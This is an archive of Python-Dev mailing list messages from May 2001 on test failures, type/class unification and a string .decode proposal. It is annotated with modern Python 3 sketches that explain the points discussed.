From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 10 May 2001 09:16:24 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>
 <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <15098.41656.128146.826459@beluga.mojam.com>

    Guido> Yes, but in the mean time the fact that it's buggy doesn't bother
    Guido> me at all.  Let it be as buggy as it always was -- that's one
    Guido> more reason to stop using it! :-)

In fact, perhaps the import warning could mention that strop is buggy and
won't be fixed... :-)

Skip


From skip@pobox.com (Skip Montanaro)  Thu May 10 15:32:15 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 10 May 2001 09:32:15 -0500
Subject: [Python-Dev] test___all__ failing on WIndows
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEFAKBAA.tim.one@home.com>
Message-ID: <15098.42607.84670.323361@beluga.mojam.com>

    >> python  ../lib/test/regrtest.py test___all__
    Tim> test___all__
    Tim> test test___all__ failed -- tty has no __all__ attribute
    Tim> 1 test failed: test___all__

grumble, grumble...

    Tim> I assume this is yet another case where some excruciatingly
    Tim> non-obvious sequence of failing imports manages to leave behind a
    Tim> damaged module object in sys.modules that prevents test___all__'s
    Tim> import of tty from getting the ImportError it *ought* to get under
    Tim> Windows (and betting termios is the ultimate culprit).

I (thankfully) gave up even pretending to run Windows recently, so I can
only make a suggestion for others who look into this problem.  Try this:
Change test___all__.check_all so that the except clause reads:

    except ImportError, msg:

then print out msg when an import fails.  You should get the actual module
that failed to import.  If foo.py consists of simply "import bar", and I
import it, I see that bar couldn't be imported:

    >>> try:
    ...   import foo
    ... except ImportError, msg:
    ...   print msg
    ... 
    No module named bar
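The same suggestion in Python 3 syntax, as a sketch: `except ImportError, msg` becomes `except ImportError as exc`, and since Python 3.3 the exception's name attribute usually identifies the module that actually failed. That matters when the real culprit is a dependency such as termios rather than the module being checked. check_all here is a hypothetical stand-in for the test's helper, not its actual code.

```python
import importlib


def check_all(modname):
    """Hypothetical Python 3 take on test___all__.check_all.

    Returns the set of names in the module's __all__, or None when the
    module cannot be imported on this platform.
    """
    try:
        mod = importlib.import_module(modname)
    except ImportError as exc:
        # exc.name usually identifies the module that really failed, which
        # may be a dependency rather than modname itself.
        print(f"skipping {modname}: {exc} (failing module: {exc.name!r})")
        return None
    if not hasattr(mod, "__all__"):
        raise AssertionError(f"{modname} has no __all__ attribute")
    # "from mod import *" should bind exactly the names listed in __all__.
    names = {}
    exec(f"from {modname} import *", names)
    names.pop("__builtins__", None)
    if set(names) != set(mod.__all__):
        raise AssertionError(f"{modname}: import * disagrees with __all__")
    return set(mod.__all__)
```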

Skip


From fdrake@acm.org  Thu May 10 15:57:59 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:57:59 -0400 (EDT)
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > But having suffered too many "impossible problems" the last 36 hours, my
 > confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
 > current CVS?  Fred, are you *sure* it fails for you -- if so, does the
 > problem actually go away if you revert mmapmodule.c?

  It was indeed showing the behavior I described!  I figured out what
it was this morning and closed the patch again.
  The problem, of course(!), had nothing to do with mmap, before or
after any of the recent changes to mmap.  Or any old changes.  It had
a lot to do with the change I made to the socket module.  ;-)
  While figuring out the reported bug in the socket module, I created
named pipes, including one named "foo".  The mmap test opens a file
"foo" with mode "w+" in the directory in which I just happened to
create the named pipe, so it ended up with a file object opened on a
pipe -- things just don't work the same for these beasts!  Needless to
say test_mmap failed with a cryptic error message.
  This raises the question, though -- should tests that create temp
files check that the files don't already exist, and fail with a more
descriptive error if they do?
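One way to get that descriptive failure, sketched in Python 3 (an assumption; the 2001 test suite predates these APIs): open the scratch file in exclusive-creation mode ("x+"), which refuses any existing path, including a leftover named pipe, and turn the error into a message that says what is in the way. The helper name open_fresh is hypothetical; tempfile.mkstemp() avoids the problem entirely by choosing an unused name.

```python
import os
import stat
import tempfile


def open_fresh(path):
    """Create `path` for reading and writing, refusing to reuse an existing entry."""
    try:
        return open(path, "x+")   # exclusive create: fails if anything is already there
    except FileExistsError:
        st = os.lstat(path)
        if stat.S_ISFIFO(st.st_mode):
            kind = "a named pipe"
        elif stat.S_ISDIR(st.st_mode):
            kind = "a directory"
        else:
            kind = "an existing file"
        raise RuntimeError(
            f"test file {path!r} is already {kind}; remove it and rerun") from None


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as scratch:
        path = os.path.join(scratch, "foo")
        with open_fresh(path) as f:
            f.write("\0" * 4096)
        try:
            open_fresh(path)      # second attempt hits the existing file
        except RuntimeError as exc:
            print(exc)
```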


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake@acm.org  Thu May 10 15:59:08 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 10 May 2001 10:59:08 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
 <15098.2126.368714.159135@slothrop.digicool.com>
Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com>

Jeremy Hylton writes:
 > The latest CVS build works on my Linux 2.2.12 system.  No problem with
 > test_mmap.  But test_pty does fail with some complaints about FCNTL,
 > which Fred just removed.  Maybe Fred is working in an alternate
 > universe where test_mmap and test_pty are swapped.

  Or, I could just be working in an alternate universe altogether.
I've been known to do that....


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From paulp@ActiveState.com  Thu May 10 22:55:36 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 14:55:36 -0700
Subject: [Python-Dev] Type/class
Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com>

-------- Original Message --------
Log Message:

Make attributes of subtypes writable, but only for dynamic subtypes
derived in Python using a class statement; static subtypes derived in
C still have read-only attributes.
-------- Original Message --------

I would like to argue that "plain old C types" should act as if they
have __dict__s for consistency with other types. It is sometimes useful
to be able to annotate objects by adding attributes to them. But this
only works with class instance objects, not instances of types.

 Paul Prescod


From jeremy@digicool.com  Thu May 10 22:59:34 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Thu, 10 May 2001 17:59:34 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com>
Message-ID: <15099.3910.648127.25900@slothrop.digicool.com>

>>>>> "PP" == Paul Prescod <paulp@ActiveState.com> writes:

  PP> I would like to argue that "plain old C types" should act as if
  PP> they have __dict__s for consistency with other types. It is
  PP> sometimes useful to be able to annotate objects by adding
  PP> attributes to them. But this only works with class instance
  PP> objects, not instances of types.

Every type should have an __dict__ of type dict?  Then every dict
must have an __dict__, including the __dict__ of __dict__?

Once every object has an __dict__, every object will be mutable.  Then
no object will be usable as a dict key and we can get rid of dicts
entirely.

Jeremy


From fdrake@cj42289-a.reston1.va.home.com  Thu May 10 23:47:14 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 18:47:14 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010510224714.15E4328946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update for the maintenance version docs.


From fdrake@cj42289-a.reston1.va.home.com  Fri May 11 00:04:40 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Thu, 10 May 2001 19:04:40 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010510230440.30DB228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update for the development version of the docs.


From guido@digicool.com  Fri May 11 01:03:13 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 19:03:13 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 14:55:36 MST."
 <3AFB0E58.1F0ABCA6@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com>
Message-ID: <200105110003.TAA02924@cj20424-a.reston1.va.home.com>

Glad somebody is watching what I'm doing here -- I was afraid I was
having too much fun by myself! :-)

> -------- Original Message --------
> Log Message:
> 
> Make attributes of subtypes writable, but only for dynamic subtypes
> derived in Python using a class statement; static subtypes derived in
> C still have read-only attributes.
> -------- Original Message --------
> 
> I would like to argue that "plain old C types" should act as if they
> have __dict__s for consistency with other types.

Good point.  Plain old types currently (in the descr-branch) have a
readonly dict (using a proxy) and no settable attributes.  I will
probably give types settable attributes in a next revision, but I
prefer not to make the type's dict writable -- I need to be able to
watch the setattr calls so that if someone changes
DictType.__getitem__ I can change the mp_subscript to a C function
that calls the __getitem__ method.  For speed reasons, if you don't
override them, the C tp_slot functions carry out the operation
directly, and the __slot__ methods call the C tp_slot functions; but
when __slot__ is overridden, tp_slot must call __slot__.
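The observable effect of that dispatch rule is still visible in today's Python. Once a subclass overrides `__getitem__`, subscription goes through the Python method, while methods that were not overridden keep using the C implementation directly. This is a sketch in modern Python, not the descr-branch code itself. `LoggingDict` is an illustrative name, and `dict.get` is used to show a path that does not consult the override.

```python
class LoggingDict(dict):
    """Overrides __getitem__, so d[key] is dispatched to Python code."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.lookups = []  # subclass instances have a __dict__ for this

    def __getitem__(self, key):
        self.lookups.append(key)          # record every subscription
        return super().__getitem__(key)   # then use the C implementation


d = LoggingDict(a=1, b=2)
assert d["a"] == 1            # goes through the override
assert d.get("b") == 2        # dict.get does its lookup in C directly
assert d.lookups == ["a"]     # only the subscription was recorded
```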

> It is sometimes useful
> to be able to annotate objects by adding attributes to them. But this
> only works with class instance objects, not instances of types.
> 
>  Paul Prescod

If you're talking about *instances*: instances of subtypes of built-in
types have a dict of their own to which you can add stuff to your
heart's content.  Instances of built-in types will continue not to
have a dict (it would cost too much space if *every* object had a
dict, even if it was a NULL pointer when no attrs are defined).

If you mean you want to annotate types like you can annotate classes,
that should be possible once I implement what I describe above.
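Guido's distinction between instances of built-in types and instances of their subtypes still describes how CPython behaves. The following is a minimal check in modern Python, and the class name is illustrative.

```python
class TaggedList(list):
    """A trivial subtype: its instances get a per-instance __dict__."""
    pass


plain = [1, 2, 3]
tagged = TaggedList([1, 2, 3])

tagged.source = "config file"      # fine: subtype instances have a __dict__
assert tagged.__dict__ == {"source": "config file"}

try:
    plain.source = "config file"   # built-in list instances have no __dict__
    plain_accepts_attrs = True
except AttributeError:
    plain_accepts_attrs = False

assert not plain_accepts_attrs
```

If a subclass declares `__slots__ = ()`, the per-instance dict goes away again. That is the usual way to keep the space savings Guido mentions.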

--Guido van Rossum (home page: http://www.python.org/~guido/)


From paulp@ActiveState.com  Fri May 11 00:22:16 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 16:22:16 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com>
Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com>

Jeremy Hylton wrote:
> 
> >>>>> "PP" == Paul Prescod <paulp@ActiveState.com> writes:
> 
>   PP> I would like to argue that "plain old C types" should act as if
>   PP> they have __dict__s for consistency with other types. It is
>   PP> sometimes useful to be able to annotate objects by adding
>   PP> attributes to them. But this only works with class instance
>   PP> objects, not instances of types.
> 
> Every type should have an __dict__ of type dict?  Then every dict
> must have an __dict__, including the __dict__ of __dict__?

What's wrong with that? Every object has a type, even type objects, and
type types. It only becomes a problem if you try to recursively walk all
the dictionaries in the system adding information to them. Otherwise
they have null pointers that "act as if" they were empty dictionaries.

> Once every object has an __dict__, every object will be mutable.  Then
> no object will be usable as a dict key and we can get rid of dicts
> entirely.

According to that argument, instances cannot be dictionary keys. That is
simply not true. Objects do not implement their hash functions in terms
of ALL of their attributes!
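Paul's point can be checked in a few lines. A class instance can carry arbitrary mutable attributes and still be a good dict key, because its hash comes from identity, or from whatever the class chooses. It does not come from the attribute dict. This is a minimal sketch in modern Python, and the class names are illustrative.

```python
class Annotated:
    """Instances hash by identity (the default), so adding attributes is harmless."""
    pass


class Point:
    """Hash only the coordinates; extra attributes don't participate."""

    def __init__(self, x, y):
        self._x, self._y = x, y

    def __eq__(self, other):
        return isinstance(other, Point) and (self._x, self._y) == (other._x, other._y)

    def __hash__(self):
        return hash((self._x, self._y))


a = Annotated()
table = {a: "first"}
a.note = "added after insertion"   # mutating the instance dict...
assert table[a] == "first"         # ...doesn't disturb the key lookup

p = Point(1, 2)
table[p] = "point"
p.label = "annotated"              # not part of __hash__/__eq__
assert table[Point(1, 2)] == "point"
```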

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mwh@python.net  Fri May 11 00:31:53 2001
From: mwh@python.net (Michael Hudson)
Date: Fri, 11 May 2001 00:31:53 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10
Message-ID: <Pine.LNX.4.30.0105110031170.14911-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 Apr 26 and May 9 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list@python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration).  All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the seventh summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 228

    40 |                         [|]
       |                         [|]
       |                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    30 |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    20 |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|] [|]                 [|]
       |     [|]                 [|] [|] [|]             [|] [|]
       |     [|]                 [|] [|] [|]             [|] [|]
    10 |     [|]                 [|] [|] [|]         [|] [|] [|]
       |     [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
     0 +-007-024-010-001-010-010-044-023-019-010-002-012-017-039
        Thu 26| Sat 28| Mon 30| Wed 02| Fri 04| Sun 06| Tue 08|
            Fri 27  Sun 29  Tue 01  Thu 03  Sat 05  Mon 07  Wed 09

  A fairly quiet, but interesting fortnight (and I don't mean the
  sarcastic replies to the Homepage virus).  A few build problems and
  bugs fixed, and one very involved discussion (cf. most of the rest
  of this summary).


    * type == class? *

 Guido posted a message from Jim Althoff describing the metaclass
 system used in Smalltalk:

  <http://mail.python.org/pipermail/python-dev/2001-May/014508.html>

 He also mentioned a problem that is bound to bite any attempt to heal
 the type/class split in Python.  If there are to be no special cases
 in the type system then classes and types in particular should be
 instances.  This sounds innocuous, but consider:

    class MyDictType(DictType):
        def __repr__(self):
            return "MyDictType(%s)" % DictType.__repr__(self)

 The code is hoping that, as in today's Python, DictType.__repr__ will
 return an unbound method - the __repr__ method of vanilla
 dictionaries, so that output of the form

    MyDictType({1:2})

 will be given.  But DictType is now an instance, so there's another
 interpretation for DictType.__repr__ - the type object's own __repr__
 method, bound to DictType itself!  This is a fundamental problem; currently
 "class.attr" and "instance.attr" have different meanings in Python,
 and any attempt to conflate the notions of "class" and "instance" is
 bound to run aground.  Guido proposed some hairy disambiguation rules
 in the above-linked message, but no-one was particularly enthused
 about them, possibly because no-one could really get their head round
 them.
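The ambiguity was eventually settled in favour of the first reading. Attribute lookup on a class consults the class and its bases before ordinary (non-data) attributes of its metaclass. As a result, `dict.__repr__` is the method for dict *instances*, and the type object's own repr is reached through `type.__repr__` (or `repr(dict)`). This is a sketch in modern Python 3, with `dict` standing in for the old `DictType`.

```python
class MyDict(dict):
    def __repr__(self):
        # dict.__repr__ resolves to the method for dict instances,
        # not to the repr of the dict type object itself.
        return "MyDict(%s)" % dict.__repr__(self)


assert repr(MyDict({1: 2})) == "MyDict({1: 2})"
assert dict.__repr__({1: 2}) == "{1: 2}"         # instance-level method
assert type.__repr__(dict) == "<class 'dict'>"   # the type object's own repr
assert repr(dict) == "<class 'dict'>"
```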

 The long term solution is to change the syntax for getting - or
 removing entirely - unbound methods.  As far as anyone can make out,
 all that unbound methods are used for is calling superclasses' methods
 from overriding methods, so if one can find another way of spelling
 that, then removing unbound methods entirely could be contemplated.
 So the discussion on that went around for a bit, with no really new
 compelling ideas surfacing.  There was some support for some kind of
 souped up super.foo() construct:

  <http://mail.python.org/pipermail/python-dev/2001-May/014523.html>

 To me, the most plausible ideas came from Thomas Heller:

  <http://mail.python.org/pipermail/python-dev/2001-May/014517.html>

 and from Paul Dubois, who suggested nicking the feature renaming
 feature from Eiffel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014573.html>

 though the best syntax for the latter is far from clear.
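The spelling that eventually won is the `super()` built-in. It was introduced with new-style classes in Python 2.2 and has been usable without arguments since Python 3.0. The following is a minimal sketch of calling an overridden superclass method without going through an unbound method.

```python
class Base:
    def describe(self):
        return "Base"


class Derived(Base):
    def describe(self):
        # Instead of Base.describe(self), ask for the next class
        # in the method resolution order.
        return "Derived+" + super().describe()


assert Derived().describe() == "Derived+Base"
```

Python 3 also dropped unbound methods as a separate kind of object. There, `Base.describe` is simply a plain function.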

 There's also the king-sized issue of backwards compatibility; to a
 first approximation, *all* Python code that uses
 inheritance would need to be updated to accommodate changes in the
 meaning of "class.attribute".  Another __future__ statement, maybe?


    * data.decode *

 Marc-Andre Lemburg asked if it might be an idea if string objects
 sprouted a .decode method:

  <http://mail.python.org/pipermail/python-dev/2001-May/014547.html>

 After some umming and arring and accusations of bloat, this got BDFL
 approval, and should appear in CVS imminently.


    * Moving MacPython to sourceforge *

 Jack Jansen posted notice that he intends to move the MacPython code
 over to sourceforge:

  <http://mail.python.org/pipermail/python-dev/2001-May/014611.html>

 It will be nice to finally have all the code in the same place!

Cheers,
M.


From paulp@ActiveState.com  Fri May 11 01:26:43 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 17:26:43 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>
Message-ID: <3AFB31C3.5CEF9064@ActiveState.com>

Guido van Rossum wrote:
> 
>...
> 
> Good point.  Plain old types currently (in the descr-branch) have a
> readonly dict (using a proxy) and no settable attributes.  I will
> probably give types settable attributes in a next revision, but I
> prefer not to make the type's dict writable -- I need to be able to
> watch the setattr calls so that if someone changes
> DictType.__getitem__ I can change the mp_subscript to a C function
> that calls the __getitem__ method.  

I'm happy to have you look and see if I'm setting something magical. But
if I'm not, I would like you to just add the thing I made to an internal
private dictionary and remember it. I think that's what you are talking
about.

>...
> If you're talking about *instances*: instances of subtypes of built-in
> types have a dict of their own to which you can add stuff to your
> heart's content.  Instances of built-in types will continue not to
> have a dict (it would cost too much space if *every* object had a
> dict, even if it was a NULL pointer when no attrs are defined).

Darn. That *is* what I was hoping for.

There is an implementation that is slowish if you use it, but has little
cost if you don't: keep a big dict mapping object pointers to their
associated dictionaries (if any). For purposes of discussion, call it
sys._associations. Then have the getattr on "PyObject" look in this dict
of dicts for attributes that it can't otherwise find, and setattr
construct dictionaries in the dict of dicts if necessary.

That's the usual workaround anyhow, so this would be a nicer syntax and a
more orthogonal model.

Price: a hasattr that would return false or getattr that would raise
AttributeError would be a little slower. They would have to check the
dictionary of dictionaries before deciding that they really don't have
the attribute.
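Paul's side table can be prototyped in pure Python to see where the cost lands. The sketch below is hypothetical. `sys._associations` never existed, and `associations`, `set_extra` and `get_extra` are invented names. Many built-in objects cannot be weakly referenced, so the sketch keeps each annotated object alive to stop its `id()` from being reused. That is exactly the kind of hidden cost Guido objects to.

```python
# Hypothetical side table: id(obj) -> (obj, attribute dict).
# Holding a strong reference to obj prevents its id() from being reused
# by a different object (at the price of never freeing obj).
associations = {}

_MISSING = object()


def set_extra(obj, name, value):
    """Attach an attribute to any object, even one without a __dict__."""
    entry = associations.setdefault(id(obj), (obj, {}))
    entry[1][name] = value


def get_extra(obj, name, default=_MISSING):
    """Normal attribute lookup first, then the side table, then fail."""
    try:
        return getattr(obj, name)
    except AttributeError:
        pass
    # This extra probe is the "little slower" path Paul mentions:
    # every failed lookup pays for one more dict access.
    entry = associations.get(id(obj))
    if entry is not None and name in entry[1]:
        return entry[1][name]
    if default is not _MISSING:
        return default
    raise AttributeError(name)


n = 12345678
set_extra(n, "unit", "bytes")
assert get_extra(n, "unit") == "bytes"
assert get_extra(n, "real") == 12345678     # ordinary attributes still win
assert get_extra("abc", "unit", None) is None
```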
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido@digicool.com  Fri May 11 02:57:36 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 20:57:36 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST."
 <3AFB31C3.5CEF9064@ActiveState.com>
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>
 <3AFB31C3.5CEF9064@ActiveState.com>
Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com>

> > Good point.  Plain old types currently (in the descr-branch) have a
> > readonly dict (using a proxy) and no settable attributes.  I will
> > probably give types settable attributes in a next revision, but I
> > prefer not to make the type's dict writable -- I need to be able to
> > watch the setattr calls so that if someone changes
> > DictType.__getitem__ I can change the mp_subscript to a C function
> > that calls the __getitem__ method.  
> 
> I'm happy to have you look and see if I'm setting something magical. But
> if I'm not, I would like you to just add the thing I made to an internal
> private dictionary and remember it. I think that's what you are talking
> about.

OK, we agree on this one.

> >...
> > If you're talking about *instances*: instances of subtypes of built-in
> > types have a dict of their own to which you can add stuff to your
> > heart's content.  Instances of built-in types will continue not to
> > have a dict (it would cost too much space if *every* object had a
> > dict, even if it was a NULL pointer when no attrs are defined).
> 
> Darn. That *is* what I was hoping for.
> 
> There is an implementation that is slowish if you use it, but has little
> cost if you don't: keep a big dict mapping object pointers to their
> associated dictionaries (if any). For purposes of discussion, call it
> sys._associations. Then have the getattr on "PyObject" look in this dict
> of dicts for attributes that it can't otherwise find, and setattr
> construct dictionaries in the dict of dicts if necessary.
> 
> That's the usual workaround anyhow, so this would be a nicer syntax and a
> more orthogonal model.
> 
> Price: a hasattr that would return false or getattr that would raise
> AttributeError would be a little slower. They would have to check the
> dictionary of dictionaries before deciding that they really don't have
> the attribute.

Personally, if you want this outrageous implementation, you should be
paying for it, not the infrastructure.  It feels contrary to Python's
treatment of objects.  I don't like elaborate workarounds in the
implementation like this -- probably because the performance model
becomes muddy.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Fri May 11 02:05:11 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 11 May 2001 13:05:11 +1200 (NZST)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com>
Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz>

Paul Prescod <paulp@ActiveState.com>:

> Otherwise
> they have null pointers that "act as if" they were empty
> dictionaries.

Actually, they need to act as if they were empty except for
a "__dict__" slot which contains another one of these magic
things. :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From barry@digicool.com  Fri May 11 04:45:38 2001
From: barry@digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 23:45:38 -0400
Subject: [Python-Dev] Interview with Mark Lutz
Message-ID: <15099.24674.311472.184935@anthem.wooz.org>

Great interview with Mark on the ORA site, linked from /.

    http://python.oreilly.com/news/python_0501.html

-Barry


From fredrik@effbot.org  Fri May 11 06:57:34 2001
From: fredrik@effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 07:57:34 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org>
Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid>

barry wrote:

> Great interview with Mark on the ORA site, linked from /.
> 
>     http://python.oreilly.com/news/python_0501.html

you mean that python-devers read slashdot for python news,
when you have the daily url:

    http://www.pythonware.com/daily

Cheers /F


From thomas@xs4all.net  Fri May 11 10:02:26 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Fri, 11 May 2001 11:02:26 +0200
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com> <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>
Message-ID: <20010511110226.M16486@xs4all.nl>

On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote:

[ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets
  bitten in the derriere ]

>   This begs the question, though -- should tests that create temp
> files check that the files don't already exist, and fail with a more
> descriptive error if they do?

I'd think so, yes. I'd also suggest that nothing use something as lamenamed as
'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the
first count :) How about having mmap call its test file 'test_mmap.foo'?
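Fred's suggestion is cheap to implement with an exclusive create: fail loudly if the scratch file already exists. Combining it with Thomas's distinctive file name avoids both the collision and the confusing failure. This is a sketch in modern Python. `create_test_file` is a hypothetical helper and is not part of the test suite.

```python
import os
import tempfile


def create_test_file(path, data=b""):
    """Create path for a test, refusing to reuse a file that already exists."""
    try:
        # O_EXCL makes creation fail atomically if the file exists.
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        raise RuntimeError(
            "test file %r already exists; remove it or pick another name" % path
        ) from None
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


with tempfile.TemporaryDirectory() as scratch:
    name = os.path.join(scratch, "test_mmap.foo")   # descriptive, test-specific name
    create_test_file(name, b"\0" * 16)
    try:
        create_test_file(name)
        second_attempt_failed = False
    except RuntimeError:
        second_attempt_failed = True

assert second_attempt_failed
```

In current code, the `tempfile` module alone usually removes the need to pick a fixed name at all.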

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal@lemburg.com  Fri May 11 10:34:25 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:34:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFBB221.F29BCB9A@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com> writes:
> 
> > I've attached the patch. Due to a small reorganisation the patch is
> > a little longer -- symmetry has its price at C level too ;-)
> 
> I may be being dense, but can you explain what's going on here:
> 
> ->> u'\u00e3'.encode('latin-1')
> '\xe3'
> ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> Traceback (most recent call last):
>   File "<input>", line 1, in ?
> UnicodeError: ASCII encoding error: ordinal not in range(128)

The string.decode() method will try to reuse the Unicode
codecs here. To do this, it will have to convert the string
to Unicode first and this fails due to the character not being
in the ASCII range.

> Can you come up with some other example I can use in tomorrow's
> python-dev summary?

I will add some codecs which make the .decode() method useful
next week. The ones I have in mind are base64, hex and some of
the other binascii codecs. Also, the ROT13 codec I posted will
go into the core as a simple example.

With those you will be able to write:

data.encode('base64').decode('base64')

and get back data.
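In today's Python, the str/bytes split moved these transformations off the `.encode()`/`.decode()` methods. The codecs MAL describes (base64, hex, and the ROT13 text codec) are still reachable through the `codecs` module's `encode()` and `decode()` functions. Here is a short sketch of the round trip he promises.

```python
import codecs

data = b"Python-Dev"

encoded = codecs.encode(data, "base64")          # bytes -> base64 bytes
assert codecs.decode(encoded, "base64") == data  # ...and back again

as_hex = codecs.encode(data, "hex")
assert as_hex == b"507974686f6e2d446576"
assert codecs.decode(as_hex, "hex") == data

# ROT13 is a str-to-str codec in Python 3.
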